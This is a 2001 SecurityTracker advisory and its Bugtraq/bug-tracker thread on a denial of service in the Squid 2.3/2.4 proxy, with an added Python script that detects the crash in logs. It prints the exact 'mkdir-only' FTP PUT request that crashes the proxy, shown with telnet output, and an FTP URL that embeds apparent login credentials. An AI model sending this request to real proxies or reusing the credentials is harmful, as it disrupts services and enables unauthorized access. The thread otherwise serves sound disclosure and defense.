SecurityTracker.com
Category:   Application (Generic)  >   Squid
Vendors:   [Multiple Authors/Vendors]
Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
SecurityTracker Alert ID:  1002439
SecurityTracker URL:  http://securitytracker.com/id/1002439
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 21 2001
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.3 and 2.4 series
Description:   A denial of service vulnerability was reported in the Squid proxy caching server. A remote user can cause the proxy caching service to crash.

A PUT request to an FTP URL that only requires a directory to be created (a "mkdir-only" PUT) will cause the Squid proxy to crash. For example:

PUT ftp://cgi-lexus:yGDgX9@[ftpserveraddress]/WEB-INF/1/2/1/ HTTP/1.1

The following log messages will be created as a result of this type of command:

Sep 10 14:17:11 azimuth (squid): xstrdup: tried to dup a NULL pointer!
Sep 10 14:17:11 azimuth squid[3027]: Squid Parent: child process 12742 exited due to signal 6
Sep 10 14:17:14 azimuth squid[3027]: Squid Parent: child process 12745 started

It is reported that the process will reload within a few seconds and return to normal operation.
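
A log check for the crash signature above, as an added example that is not part of the original advisory or of Squid. It pairs the xstrdup message with the signal 6 child exit and measures how long the proxy was down before the parent respawned a child; the function name, the 5-second pairing window and the supplied year are assumptions.

```python
import re
from datetime import datetime, timedelta

# Syslog layout used in the excerpt: "Mon DD HH:MM:SS host tag: message"
LINE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) (.+?): (.*)$")
EXITED = re.compile(r"Squid Parent: child process (\d+) exited due to signal (\d+)")
STARTED = re.compile(r"Squid Parent: child process \d+ started")
FATAL = "xstrdup: tried to dup a NULL pointer!"

def find_aborts(lines, year=2001, window=timedelta(seconds=5)):
    """Return one record per child that exited on signal 6 (SIGABRT)."""
    aborts, last_fatal = [], {}
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue
        # Syslog omits the year, so the caller supplies it (assumption).
        when = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        host, msg = m.group(2), m.group(4)
        if FATAL in msg:
            last_fatal[host] = when
        elif (e := EXITED.search(msg)) and e.group(2) == "6":
            seen = last_fatal.get(host)
            aborts.append({
                "host": host, "pid": int(e.group(1)), "time": when,
                # True only when the xstrdup message closely precedes the abort
                "null_dup": seen is not None and timedelta(0) <= when - seen <= window,
                "restart_after": None,  # seconds until the parent respawned a child
            })
        elif STARTED.search(msg):
            # Attribute the restart to the most recent unmatched abort on this host
            for a in reversed(aborts):
                if a["host"] == host and a["restart_after"] is None:
                    a["restart_after"] = (when - a["time"]).total_seconds()
                    break
    return aborts

# First three lines are the advisory's excerpt; the last one is constructed.
SAMPLE = """\
Sep 10 14:17:11 azimuth (squid): xstrdup: tried to dup a NULL pointer!
Sep 10 14:17:11 azimuth squid[3027]: Squid Parent: child process 12742 exited due to signal 6
Sep 10 14:17:14 azimuth squid[3027]: Squid Parent: child process 12745 started
Sep 10 15:02:40 azimuth squid[3027]: Squid Parent: child process 12745 exited due to signal 6
""".splitlines()

if __name__ == "__main__":
    for a in find_aborts(SAMPLE):
        print(a["time"], a["host"], a["pid"], a["null_dup"], a["restart_after"])
```

Records with `null_dup` set match this advisory's signature; a signal 6 exit without it is an abort from some other cause and needs separate triage.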

Impact:   A remote user can cause the Squid proxy to crash.
Solution:   The vendor has released a fix. The latest version can be obtained from the vendor's web site:

http://www.squid-cache.org/

Vendor URL:  www.squid-cache.org/bugs/show_bug.cgi?id=233
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on RedHat 6.2 and 7.1.

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Conectiva Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Red Hat Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Red Hat Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(SuSE Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Mandrake Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Turbolinux Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(FreeBSD Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Caldera Issues Fix for OpenLinux) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix for OpenLinux.



 Source Message Contents

Subject:  squid DoS


Dear All,

I'd like to inform about a DoS bug I recently found in SQUID regarding
handling of mkdir-only PUT requests - please look at
http://www.squid-cache.org/bugs/show_bug.cgi?id=233 for more info.
From my testing, it applies both to Squid 2.3 and 2.4 series. Tested on
RedHat 6.2 and 7.1.

This bug has been fixed by SQUID developers on Sep 18 and has been known
for about two weeks - I think it's time to inform Bugtraq.

--
Best Regards
Vladimir Ivaschenko
Certified Linux Engineer (RHCE)
http://www.hazard.maks.net/


------------------------------------------------------------
From http://www.squid-cache.org/bugs/show_bug.cgi?id=233

I'm running SQUID-2.4STABLE1 on RedHat 6.2 and started to receive squid crashes
(it reloads after a few seconds). I narrowed the problem down, one of our users
started to use FAR with FAR Navigator plugin to upload to a free webhosting
site. Essentially, if you do the following request:

$ telnet proxy:3128
PUT ftp://cgi-lexus:yGDgX9@ftp.mycgiserver.com/WEB-INF/1/2/1/ HTTP/1.1
Content-type: application/octet-stream
Content-length: 0
Pragma: no-cache



Connection closed by foreign host.

The squid will crash:

$ telnet proxy:3128
Trying proxy...
telnet: Unable to connect to remote host: Connection refused

The following message will appear in the log:

Sep 10 14:17:11 azimuth (squid): xstrdup: tried to dup a NULL pointer!
Sep 10 14:17:11 azimuth squid[3027]: Squid Parent: child process 12742 exited due to signal 6
Sep 10 14:17:14 azimuth squid[3027]: Squid Parent: child process 12745 started

OS is RedHat 6.2, squid is compiled from SRPM for RedHat 7.1. The same also
happened while I was running SQUID-2.3, actually that's what prompted me to
upgrade to SQUID-2.4. I didn't find any core files. I tried setting up my own
FTP server and couldn't force the same error. However it should be easy to
duplicate the error by issuing the request above, to exactly same FTP server. I
tried on two different proxy servers running RH 6.2 and same squid versions (2.3
and 2.4) and could duplicate the error.



------- Additional Comments From hazard@francoudi.com 2001-09-11 00:56 -------

I checked on another machine with SQUID 2.3STABLE4 with the same result. Please
note that some modified telnet versions send some additional characters at
the beginning, and it's better to use netcat for testing the vulnerability.



------- Additional Comments From Robert Collins 2001-09-12 02:51 -------

Try Squid 2.4 stable 2, and see if the bug is fixed there. If the bug is still
present, please get a backtrace.



------- Additional Comments From hazard@francoudi.com 2001-09-12 03:32 -------

Ok, I get the same error with SQUID2.4STABLE2:

[hazard@hazard hazard]$ telnet localhost 3128
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
PUT ftp://cgi-lexus:yGDgX9@ftp.mycgiserver.com/WEB-INF/1/2/1/ HTTP/1.1
Content-type: application/octet-stream
Content-length: 0
Pragma: no-cache


Connection closed by foreign host.
[hazard@hazard hazard]$ telnet localhost 3128
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused

How do I get a backtrace if it doesn't leave a core? I think it would be easier
for you to repeat the request in your own environment.



------- Additional Comments From hazard@francoudi.com 2001-09-12 06:45 -------

I checked both 2.4STABLE1 and 2.4STABLE2 on RedHat 7.1 and observe the same
results.



------- Additional Comments From hazard@francoudi.com 2001-09-12 07:11 -------

Ok, my backtrace:

Program received signal SIGABRT, Aborted.
0x400c4d21 in __kill () from /lib/libc.so.6
(gdb) bt
#0  0x400c4d21 in __kill () from /lib/libc.so.6
#1  0x400581f7 in raise (sig=6) at signals.c:65
#2  0x400c60b8 in abort () at ../sysdeps/generic/abort.c:88
#3  0x80940f3 in fatal_dump ()
#4  0x80ab088 in xstrdup ()
#5  0x806c30a in ftpSendReply ()
#6  0x806b5b8 in ftpSendStor ()
#7  0x806b4ee in ftpRestOrList ()
#8  0x806b086 in ftpPasvCallback ()
#9  0x805da08 in commConnectCallback ()
#10 0x805dd28 in commConnectHandle ()
#11 0x805f896 in comm_poll ()
#12 0x807bdfd in main ()
#13 0x400be9cb in __libc_start_main (main=0x807ba74 <main>, argc=3, 
    argv=0xbffffb24, init=0x8049ec0 <_init>, fini=0x80ae69c <_fini>, 
    rtld_fini=0x4000ae60 <_dl_fini>, stack_end=0xbffffb1c)
    at ../sysdeps/generic/libc-start.c:92


Squid was built with the following:

%configure \
   --exec_prefix=/usr --bindir=/usr/sbin --libexecdir=/usr/lib/squid \
   --localstatedir=/var --sysconfdir=/etc/squid \
   --enable-poll --enable-snmp --enable-removal-policies="heap,lru" \
   --enable-storeio="aufs,coss,diskd,ufs" \
   --enable-delay-pools --enable-linux-netfilter \
   --enable-htcp --enable-carp --with-pthreads \
   --enable-auth-modules="LDAP,NCSA,PAM,SMB,MSNT"



------- Additional Comments From hazard@francoudi.com 2001-09-12 07:20 -------

Just in case, the backtrace was done via gdb running squid -X -N



------- Additional Comments From hazard@francoudi.com 2001-09-13 06:22 -------

Any news? I think this is a very critical bug, if it is a bug.



------- Additional Comments From Henrik Nordstrom 2001-09-18 07:53 -------

Created an attachment (id=38)
Fix "mkdir-only" PUT requests



------- Additional Comments From Henrik Nordstrom 2001-09-18 07:56 -------

Patch tested and committed.


 
 

